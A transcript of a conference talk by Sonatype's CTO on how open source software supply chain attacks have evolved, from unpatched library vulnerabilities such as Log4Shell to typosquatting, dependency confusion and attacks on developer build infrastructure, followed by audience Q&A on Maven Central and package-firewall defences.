 Can someone grab the door over there? Here comes everybody all at once. All right, thanks for coming. My name is Brian Fox. I'm co-founder and CTO at Sonatype. A little bit of my background, years and years and years ago, I was one of the core committers on Apache Maven, the build system. I was AM on the project management committee. I was the chair for a long time. And for those of you that don't know, Sonatype has always been the company that runs what the world knows as Maven Central. So where the world gets their open source Java, that's been us for like 20 years. And so in the early days, we were very much focused on helping large companies manage their builds and their dependencies and understand what's going on and sort of optimize that through training and consulting around Maven. And somewhere along that journey around 2009, 2010, we started to see companies asking us, how do I do a better job of managing the dependencies that my developers are using? In those early days, it was very much focused on licensing. Everybody was afraid of the GPL and the AGPL. But we could see through some of the early vulnerabilities that the world has long since forgotten that people weren't following good practices in terms of updating their dependencies. That the most popular version of Bouncy Castle, a crypto library, was the one with the level 10 of vulnerability years after it was released. Now, probably you're all here at Supply Chain Con. That problem has not been solved, or we wouldn't be here talking about it. But we saw this back in 2009, 2010, and started trying to figure out how can we help the world sort of figure this out and move along. And so a large part of what I've been focused on in that time is helping organizations at the end of all of the stuff that we just talked about, this great talk about Git Bomb and all these things talking about the Providence. From my perspective, we're still in a world where the end user consumers still don't have supply chain practices that enable them to do anything when the inevitable vulnerability, like Log 4j, happens. And so that's where I want to spend a bit of my time talking about. Because from that long perspective, I've seen us move through three or four phases. And I think the world is still very much stuck focusing on solving the problem in phase one when the attackers are actually moved several steps ahead of that. So just context, these are the downloads from Maven Central. No evidence that Java is dying off anytime soon. We're on track for somewhere over 600 billion downloads from Maven Central these days. JavaScript looks the same. If you look at the chart for Docker, really any of the repositories out there, they all have this great hockey stick curve that show that the world is just consuming more and more open source, more of it pre-built binaries. So in the context of that last talk, trust, well, they're just consuming them. And so we better hope that we're trusting them. The supply of these things continues to explode. Newer versions, newer projects, projects onboarding onto Maven Central, always huge numbers. So the world is building and building and building more and open source, just like Eric's talk on the keynote today, we were successful and this is the result of it. The demand is exploding. Again, these are just different numbers on those same things that you can see across all these different ecosystems. So point is, lots of open source. The reality is, their supply chains are everywhere in this process. And importantly, the supply chains obviously are not a software problem to start with. And so this was Edwards Deming, probably everybody here, hopefully you've heard this, it's been beaten to death. But I'm gonna repeat it anyway, that Deming helped the Japanese auto industry rebuild after World War II, right? And go on to produce some of the most efficient, cheapest to produce reliable vehicles that we've all known to grow and love. And he did this by focusing on several of these key areas. Choosing better parts from better suppliers, using only the highest quality parts, don't pass them downstream. And importantly, continuously track the location of every part, right? So we all come to expect this from our physical goods. And as engineers, we always seem to like to reinvent the wheel. But we've been looking at this for a long time and realized, you know what, we're not the first industry with a supply chain problem. And they've solved it. But I like to talk about a couple of different examples here that have happened because I think it contextualizes what is happening in software and kind of how ridiculous that would be in the real world. So this here, this is the Chevy Cobalt. And I think it was around 2014, there was a problem with the ignition switches. And the engineers, somewhere along the line, found this problem with the ignition switch. The problem was if you had a heavy key chain hanging from it, it would cut off power and people would lose power steering and brakes. And ultimately some people unfortunately died as a result of this. But what was interesting about this when you dig into the details is they made a classic configuration management problem. They found the bug, they fixed it and they didn't rev the part number of the ignition switch. So when people started the crash and they started doing the investigation, it delayed the ability for them to figure out what actually was the problem because they're taking these parts off and they're testing them and they test out fine. You know, the classic works for me on my machine, right? And so ultimately they figured that out but then because they didn't bump that version number, they had to literally recall all the cars because they had no way of actually knowing which cars had the original rev of it and then the not revved version later, right? So in the world of physical goods, a mistake that used to happen a lot in software has very big impact, right? So that's something that we should all be familiar with. The counter example to this is the 787. When they first launched this, there was three or four instances of a plane catching fire, fortunately, at the gate. They very quickly figured it out because they had great management processes. They understood quickly that all three or four batteries that caught on fire came from the same manufacturer, the same lot, they found the other ones, they pulled it out. We all forgot that this happened, right? This was not a max, 737 max type of situation but this happened and it was scary at the beginning but because they had good practices, the results were very different than what happened with the cobalt situation. And then a few years ago, here in the US, we had, I think it was about three years in a row, we had E. coli outbreaks with lettuce, right? And the last one, the last big one, happened, it was a similar problem to the cobalt by the time people were getting sick and they were doing the investigation, the growing season had moved from Yuma to California and so they couldn't figure it out for a very long time. So what did we do? As a result, we literally threw out all the lettuce in like all of North America, right? So that's an economic disaster, it's an ecologic disaster, all of it completely preventable if we just did a better job of actually labeling the origin of the parts and after three years of this, this industry finally did that. I don't know that in all cases, they label it from the farm but they at least label it with a region of origin so now we can choose which parts to throw out, right? So these are important supply chain concepts that we as consumers expect of our physical goods, we expect that of the planes that brought us most of us here at the food that we're eating. But if you think about your own software practices, they're probably not as good as that, right? That's why we're all here, we're talking about that. So in terms of thinking about how the supply chain attacks have evolved over the last 10 to 12 years from my perspective, the first one was really exploiting existing vulnerabilities and a lot of the talk that's been going on here and trying to do a better job of improving the software and the vulnerability disclosure is very much focused on this and that's a necessary thing to do. I'm gonna breeze through these a little bit but the first big one from our perspective was this early struts one in 2013. This happened at the same time that Anonymous was doing a lot of their stuff and a lot of banks were taken down by this particular vulnerability. They didn't make a big public statement about it, they didn't get hauled in front of Congress, but it happened. It was so widespread that the FBI issued field alerts to say that, hey, you need to go talk to your banks because they're probably being attacked by this. It was point and click in a Chinese hacking toolkit, it was pretty much as bad as it could be. And so the world didn't pay attention to this but a lot of our clients did and they started to get their religion around, hey, we need a better job, we need to do a better job of understanding what's in our software and actually doing some management around it. The following year was Heartbleed and Shell Shock, again, vulnerabilities that were latent in this open source for a very long period of time that finally everybody realized was starting to be exploited. And then of course there was the Equifax example out of a slide on that because everybody's tired of looking at it but the point being all of these things existed in the software, as far as I know all of these ended up in a pretty good zero day responsible disclosure and yet people still got attacked, right? The Equifax attacks largely happened days after Apache fixed and released the updated versions of it because the customer that Equifax in that case didn't upgrade all of their servers. Same thing with these vulnerabilities here. And frankly, the log for jail talk about was basically that same class of problem from my perspective kind of old and boring. Some of these attacks have real social harm. In 2015, there was the Commons Collections one. This is a popular library in Java. It's pretty, it's like log for J. It can be assumed to exist on the class path of basically every Java application. If it's not in your application, it's almost certainly in your web application server. This didn't have quite the impact of log for J because it was a little bit harder to exploit. It was a deserialization type of attack. But this is Hollywood Presbyterian Hospital. They were ransomware for over a week and it was traced back to this vulnerability which by the way had been disclosed at DEF CON and patched almost a year before this attack happened. So again, open source in this case doing a great job of responding to the vulnerabilities fixing it but the end users are not updating and then bad things happen. And so we used to say you can't put a name on people that died. There wasn't something in the news about this but statistically it's provable that this almost certainly killed somebody because there are statistics that show if you have a heart attack in New York City or Boston on marathon day, your mortality is significantly altered simply because the ambulances have to route around the marathon route. Now imagine what happens when a major hospital in a major metropolitan has taken offline for a week. Tests that have delayed surgeries that don't happen. All people that might have to be transferred. So people almost certainly were affected by this. There was an attack more recently, I think it was Mercy Hospital in the UK where they did actually have somebody's name in the headlines that said this person had to be shipped from this hospital that was ransomware to this other one and they died because of it. So these bugs and the lack of people updating have already had huge impact to certain people. We always say people don't act until people die. That's unfortunately already been happening and yet from my perspective, too many companies are still not doing the right thing. Then of course there's log for Jay, log for Shell. This one was sort of like the combination of that early struts vulnerability that was super easy and affected you basically if you had it in your class path and combined with the widespread nature of common's collections that it can be assumed to be in almost every Java application was as bad as it could get. These were statistics that we started publishing on our website from the Maven central downloads and you can see in the early days over here, a lot of people upgraded pretty quickly but we never got really past that 60% point which wasn't super surprising in the early days but what is really disappointing is six, seven months later, we've basically flatlined. So about 40% of the world as of today are still downloading vulnerable versions of log for Jay. So there can be only one answer to that. They're not doing it on purpose. It's because they don't know what's in their software. They don't have an organizational bill of materials as we call it to understand that this is still happening. And some people were asking me before I gave this talk earlier they said, was log for Shell just a bunch to do about nothing? We didn't see anybody getting attacked. My answer to that was, well, everybody learned in the wake of Equifax and Struts not to raise their hand and say we got attacked because we didn't update over this dependency. So we're not hearing about it. It doesn't mean it didn't happen but there was a report that came out. I think this was sometime in March, March 8th that indicated that there were some APTs that were actually leveraging this. So this stuff is happening even if we're not hearing it in the news. You can be guaranteed that people are being affected by this. And so if we think about why is this happening? To think about the economics of this for a moment these statistics the first time I saw them were shocking and I felt like I kind of already understood how bad the problem was. In 2016 the illicit drug trade as an economy was estimated to be worth $435 billion. Now this is what, six years ago? Cyber crime was already a bigger industry back then. $450 billion. And if you think about how much time and energy is spent on the war on drugs and the opioid crisis and all of that as a society that we spend talking about this problem as compared to until the very recent past cyber crime that's a bit shocking. It seems like we're sort of focused on the wrong problem. And actually they've been projecting and it followed this track that this cyber crime was costing us as a society last year $6 trillion. If that were an economy it would be the third largest economy in the world after the US and China. And so projecting forward a little bit I'm not sure I believe that it levels off but they're projecting by 2025 it'll be 10 and a half trillion dollars. Now one way to think about this is this is the funding that is aligned against all of us here trying to do the good thing. This is the VC investment because this is the money driving the bad actors to find every single chink in our armor. That's a big adversary. So phase two I've called creating opportunities. So remember phase one existing bugs just boring bugs that were there people figured out how to do bad things they were disclosed and the bad actors were quickly trying to leverage the gap between the world understanding and customers upgrading. Phase two started around 2017 there was this report that came out that talked about how 14% of the things in the NPM repository were published by people who had password as their password or had checked their password into GitHub. And it was kind of a big thing they revoked all the tokens and all that stuff but for me this was kind of interesting because I had never seen this called out so blatantly that the publishers had such poor diligence around their own security. And so we started talking about that but what's interesting is just a few weeks later we saw two different attacks one on NPM one on Python that were starting to do the typosquadding. And this wasn't particularly surprising but what was really interesting from my perspective at that time both of these things were focused on exfiltrating the password tokens for the publishers. They weren't about trying to get into the software and then do something upstream they were going after all of us the open source maintainers. That was the first time I had ever seen that and I had that moment like you see something anybody else see this? This is kind of crazy. And so then for years we were talking about this I started tracking it because it seemed like that was the time when the attackers finally started to pay attention to the supply chain from my point of view and there were a whole bunch of follow on incidents where it seemed to me like they were sharing best practices and iterating and getting better and better and better at actually finding different exploits in the supply chain. And so at the end I'll show a link where you can go and read more about these but the evolution of those attacks over the following couple of years was really interesting from my perspective to watch that unfold in real time. The reason why this happens just like any other engineers they seek the most efficient path there's a lot of money behind it but they wanna be as cheap and easy as they can. This was a study that looked at the combined reach of the 100 most influential maintainers on the NPM repository and inversely how tightly integrated the top five NPM packages were in terms of other things. So you have a massive consolidation of risk in a small number of contributors. If you could steal one of those contributors tokens you can get to about half of the things in the repository at that time. That's pretty scary. And if you can slip something into one of those top five projects you can get yourself hundreds of thousands, millions of downloads almost immediately. So this is why they're starting to move up into the supply chain because it becomes a force multiplier for them. The next phase is the phase that we're really in and I don't see enough people really focusing on this. The attacks are focused on the developers and the development infrastructure itself. Right, so everybody's thinking about what happened with Log4J and their vulnerabilities and they're getting in there and they're attacking the applications or things like Equifax, they went into struts and they stole the data. But most of the newer attacks are actually looking more like what happened with CodeCov and even SolarWinds where they're trying to focus and get into that development infrastructure because it has the keys to so much of the kingdom. So this was one of the first ones that we were tracking. Back in 2018, somebody mined a whole bunch of Bitcoin. It's probably still worth more than that even after the crash. This was a long time ago. But that was one of those first targets where they found an Unpatched Jenkins server through one of these things and they started attacking it and using that somebody else was paying that cloud build to send a bunch of Bitcoin into their wallet. But last year, this one was sort of interesting. It was a similar situation but what happened here was the attackers actually used the development infrastructure to move sideways inside the organization and were able to breach a bunch of camera feeds. Camera feeds at hospitals, police stations, daycares, and a Tesla plant. So this just kind of shows people that development and the development infrastructure can be a significant way into the rest of the organization especially if you think about the production systems and these kinds of things. Development infrastructure probably somewhere has the secrets that are needed to get onto your cloud. So that makes it a super juicy target. The CodeCov incident, a similar one. This unfortunately went downstream to their users, CodeCov was a tool that helped people assess the coverage of their unit tests. The attackers figured out vulnerability in that container which then made all of their users open to supply chain attacks directly in their infrastructure. And I lost track of all of the different types of things that came out of the side of this. But it was pretty significant. And so there's again a number of these incidents where these things are focused not on trying to steal personal data, they're focused on trying to steal your credentials and your passwords. Some cases they're printing money and in many cases they're leaving back doors. In fact, early last year there was a white hat who released what he called the dependency confusion attack. So in some of the systems if you don't have something like a repository manager to control where your developers are getting their dependencies from. People figured out that if you knew that a company was using a project called Foo internally and you went to NPM and you put Foo with a high version number up there those build systems would fetch that version from the public repo. And so he did it as a proof of concept but almost immediately from our perspective we were tracking this. We saw tons of copycat attacks. Everybody else was after the bug bounty right away. But what I told my team and what I was really worried about is somewhere in that noise are gonna be the attackers. Every time this comes out you don't have enough time. Everybody looks at it and that's a great idea but it's all pile on. And so within the first 72 hours there were 300 copycats. Most of them of the same prototype code looking for the bug bounties. Within about a week we had seen the number of suspicious things that we were tracking and our system go up 7,000% all of them as a result of this. This was just a week. It took a few more weeks actually before we really started to see the malicious ones show up. I was surprised. They were a little bit slower than I thought. But they did start to show up and then this continued on and we kinda stopped tracking the number after a while. But the attackers were using the prototype code to do the same thing. Attacking companies, dropping these things in, stealing command lines and all these kinds of things. And so it follows the same pattern that we saw like in the Equifax that once this becomes known, in that Equifax case was a vulnerability in struts, in this one it was a new and novel type of way to insert malicious code into the supply chain. You don't have much time to be able to respond. And so in one of the reports we published last year we showed this number a couple years ago. We had seen 216 within that first timeframe from 2017 to 2019. The following year it exploded 430% up to 1100 and then last year it was another 650% increase. So this is the new norm. This is what's happening. None of this has anything to do with a lot of the stuff that the world is talking about right now in terms of like how do you make open source more secure? This has everything to do with the fact that the consumers are not paying attention to what their developers are using and allowing themselves their supply chain to be wide open to attacks. And so when this started happening and I started talking about it, some of our customers were asking, well, what do you do about it? How do you prevent these things? Because as soon as they hit the repository where they're malicious, they're designed to cause harm. You have zero time to respond. It's not like even the struts thing where they had three days. You've got nothing. As soon as your developers touch this, they might have had a backdoor dropped on their system. And so we actually started building some systems. We took a page from the credit card companies trying to build models around the repositories, understanding what's normal for a project, when they release, who does the releases, what type of dependency changes are normal for big projects. We fed that to some ML AI tools to help us identify these things. And at first I thought we were basically building an asteroid hunting tool. Like one that I wouldn't know when we missed something because it was gonna be so rare. But actually, as soon as we turned it on, we started to flood our own security team with valid findings. And so as of last month, we've identified 87,000 packages in the last year that were actively malicious. Over 15,000 of those, we've had to submit to repositories to get taken down. Not all of these were at that level. There were just too many for us to flood NPM and PyPy and some of the other repositories with. But the number is astronomical, right? So when we see places talking about, well, we found 200 zero days or something like that, like that's phase one, we're in phase three. This is what's happening in the world right now. And again, all of the things that we're talking about within the OpenSSF and trying to fund and make people do a better job, making the open source better and safer, that has to happen. That's obvious. But from my perspective, if the customers don't get a better job, do a better job of actually managing their open source, a lot of it is for nothing. Because no matter how hard we try, the software's written by humans, there's always gonna be vulnerabilities. It's like the auto manufacturer is saying, my suppliers got good enough at making good parts. I don't have to track the parts in my cars anymore. Like we know that's ridiculous. There's always gonna be mistakes. And so, I'm trying to make sure that the end users are focused on this part of the problem as well because it's something they can do now. All of these other things in terms of trying to produce better S-bomb standards and educate the open source developers, that's going to take time and it needs to happen. But if we leave those customers thinking that they can just sit back and wait, they're leaving themselves open to massive vulnerabilities in the meantime. So, I'm gonna jump ahead a little bit here. This was one of the surveys we did. We had been doing this annual survey. This year will be the eighth year. And this tracks, by the way, with some of the data the Linux Foundation released today. 50% as of last year, we're saying they used some process. This was pretty good because eight years ago when we tracked it, it was in like the teens. It was like 15%. So 15 to 50 feels good. Until you think about it this way. What if those industries, only 50% of them tracked their parts and only 30% of them had any mechanism to do a recall? Would we feel like that is a good situation? I don't think we would. So we shouldn't celebrate. We're making progress, but we still have so much further to go. So what I like to leave people with, you have a supply chain, even if you don't manage it, you'd be surprised how many companies I talk to who are just completely in the dark about this. So if you ignore it, the problem's not gonna go away. And the attackers are exploiting that whether you're doing anything about it or not. And this self-evaluation is one that I've always used. The world went through this on, what was it, December 9th with Vlog4j. If I told you about a new vulnerability, do you even know if you're using this exact component? So much of the world had no idea they were using the vulnerable versions of Vlog4j. In fact, as I showed you, 40% of them clearly still don't because they're still downloading it today. Do you know which applications it's in? Can you track that remediation and how long is it gonna take you to ship and deploy an update? Because in these cases, the attackers are moving on you instantly. And worse, how would you avoid the next malicious release? So when you have zero time to respond. And this is one that's really interesting, especially in the world of COVID where so many developers have moved home. So many of those developers are now lacking the perimeter defense that they at least had in the office, right? I'm talking about the firewalls and these other types of things. The blocking of data exfiltration that might have been detected if these back doors were dropped on their systems in the office. Are they covered as sufficiently at home? Some big companies, probably yes. A bunch of the rest of the world, no. And so what I'm seeing from the patterns that are happening with developers very much looks like the 1990s. You remember when browsers were inherently vulnerable and just going to a bad website got you hacked? Well, what did those attackers rely on? They relied on the fact that somebody went to the website said, oh crap, that's not the website I thought I was at and they hit back and they went to the real one and never bothered to check or think that they got attacked. Well, this is exactly what's happening with developers right now when they pull down one of these typosquadded components. The components aren't even trying to build. They're not trying to masquerade as the valid component. Literally all they're doing is dropping a back door or exfiltrating keys or whatever and they're doing it in seconds. And so the developer grabs a component, they run their build, it fails, I go whoops, got the wrong one, I fix it, I move on with life, I check it in. Now if you're an application security team who's focused only on what's actually gotten checked in, what's actually gotten built, you completely miss that part of your development infrastructure just might have been attacked. So it's interesting when you look at these because these patterns repeat over and over, it's just a technology move. So what we saw in user behavior in a browser is what we're seeing in the user behavior of developers and dependencies right now. And so lastly I like to remind application security teams when you think about Deming principles, right? Deming and traditional application supply chain practices are focused on the end product, they're focused on the cars, making the cars better. You should and need to have good practices about doing that stuff. That's kind of table stakes but merely doing a good job of that is not protecting your factory. So what do I mean by that? If your application security teams are only paying attention to what is about to be shipped into production or shipped to your customers, you completely missed the entire phase three war that's happening right now. You will not see the back doors that were dropped on your developer machines. You won't see those types of upstream attacks. And then this was one piece of data that we found that was really interesting a couple years ago, I still like to show it. We talked to hundreds of customers, hundreds of people that filled out the survey and we kind of classified them into teams that were focused on security at all costs. This is the hardest hardcore, that's what they focus on. You've got people who are focused on just ship it really fast, that's the thing we care about. Security will be an afterthought. And then there are people who had it fully integrated and we kind of looked at what that was. And I think the world would pretty much not be surprised if I stood here and said, you know what? In order to do all of these things to be really good, you need to be able to pay attention to security and you're gonna take a hit on your performance. Like paying attention to security is going to be slower than the people who only care about going fast. That seems logical, right? Except the data shows that that's not true. That the highest performers were in fact the ones who cared about being agile, iterative and cared about managing their supply chain. It seems counterintuitive until you stop and think, just because they don't care about their supply chain doesn't mean that at some point they're not gonna have to stop and go back and fix one of these vulnerabilities that they didn't plan for. So that unplanned work, rework, is actually costing them performance. So the irony here is the way to go fast is actually to manage the supply chain. Not to just try to go fast. And I think that's a pretty interesting outcome from this. So you really can have your cake and eat it too. And so lastly, I'll leave you with this link here. You can get access to all of the historical stuff that I showed, all of the details. We're compiling and looking at the results right now for the eighth year. It'll come out in a couple of months. But all of those charts, detailed writeups of everything I showed is available there. So that's the talk. Anybody have comments or questions? We have some time left. No, no. I try not to get too jaded or too down on this because we are making progress. The fact that we're here at a conference called the Supply Chain Con, it indicates that we've come a long way. I mean, I tell this story a lot. When we first started doing, trying to solve this, we did what we did when we built the company which was open source first. That's how we made Maven successful, it's how we made Nexus repo successful. We built free tools that showed developers the licenses and the vulnerabilities of the components they were using. Nobody used them. So I went out and started talking to people. I talked to other open source developers who should have known better and they told me this like a direct quote because I never forget it. I don't have to worry about the security of my open source components because I have a firewall and I have a security team. All I have to worry about is the AGPL. So in 2011, that was the general state of understanding of what we're talking about here. So again, now we're at Supply Chain Con which means we're getting in the right direction. So there's progress, but there's still so much to go as evidenced by the fact that Log4J still downloaded 40% of the time, the wrong versions. Yeah. So I get this question every time. The question is why are those things still available? And for the first time in a long time with Log4J when this was happening in the moment, I think, Jonathan, you probably hit me on Slack a couple times. We actually talked to the Apache Maven, the Apache Log4J PMC and some of the other leaders at Apache. One of the fundamental principles of Maven is that the repository is immutable. We don't change these things. Once they're in there, you can't remove them unless it's a copyright or if it was actually malicious, we'd take it down. But it's intended to be immutable and so that's the norm. But if there was ever a case to take it down, it was a Log4J. So we got together and we started talking. And what we felt like at the time, now again, seven months later, this is a little bit of a different story. We haven't talked to them lately, but we don't wanna be in the position of playing God and deciding for the world which books to burn and which one's not. And in the moment of what was happening, we saw many companies who actually were doing a good job of triaging it, the companies that were doing a good job probably were focusing their available resources. Again, this was just before Christmas on patching the most vulnerable applications. If we unilaterally decided to just take down every other version of Log4J, by definition, we broke every other part of their portfolio. And so we like quite literally would pull the brain surgeons out of surgery to put some band-aids on knees, right? So it sounds simple to just remove these things, but because of the way the ecosystem works, you're effectively breaking every other single build kind of permanently until somebody takes an action. Now again, in Log4J, because it was so bad, we stopped and asked the team the question, should we do this? We're not gonna do this unless the Log4J PMC is on board with doing it. And there wasn't agreement even within the team that they would do that because it sort of masquerades the problem in some sense. People would just find the download from a previous build, jam it in, and now they have no way of knowing. So it's not so simple as it seems. And I wish there was a better answer to that other than putting the onus back on the end user to actually pay attention to what's going on in there. If we just break this one build for Log4J, where does it end? Do we start breaking it on level five vulnerabilities? Is it level six? Is it level seven? There's no great answer. So that's why. Go ahead. So will it have the same effect as the financial regulations of Sorbet and Oxley? I think we might get there. There was the FTC quote that was mentioned either yesterday or earlier this morning that basically said, we're paying attention companies. If we find that you've been attacked because of this, we will consider that to be negligence. You can't claim to not have known that something like Log4J was vulnerable and not doing something about it was negligent. I think we're moving in that direction, especially if the industry doesn't get their act together. The executive order was a move in that direction. It was interesting, there was a proposed bill in front of Congress in 2013 that had basically the same words. The executive order didn't come out of nowhere. They regurgitated a bill that failed to get moved to the floor in 2013. So we could have been seven, eight, nine years ahead even in the regulation moving on that. But I think we'll probably get in that situation at some point. Yeah. Have we thought about what, sorry? At Sonatype, we have. With some of our products, the repository manager, customers are proxying because it's giving them better efficiency and more control. Some of that's the reason we created that early detection stuff I talked about, the credit card fraud protection like algorithms is working in conjunction with that. So what happens is as soon as the repository, the artifact gets released saying to NPM, our systems look at the data and it basically real time can make a decision. Just like when you swipe your credit card somewhere the systems are saying is this really you? Is it normal for Brian to go to Best Buy and buy a TV in San Francisco when he lives in New Hampshire? No, it's not. So our systems are doing that and it works in conjunction with what we call the firewall product that basically stops that any downloads at the customer sites until our security team can confirm or deny that. So it allows them to basically defer any consumption of that. And it's been pretty effective, like I said. Keeping track of 87,000 malicious things in the last 12 months, nobody would ever be able to do that by hand. So that was how we ultimately were able to respond to help protect that because it's the only way. Again, if the developer downloads this thing and in the NPM install script it drops a backdoor. It's too late at that point. How do you stop it? You stop it from getting onto the machine. So that's why working with the repository manager to basically firewall that off is a good way to do that. Okay, we're out of time. So thanks everybody for coming. Hopefully you learned something. Go off and tell your friends.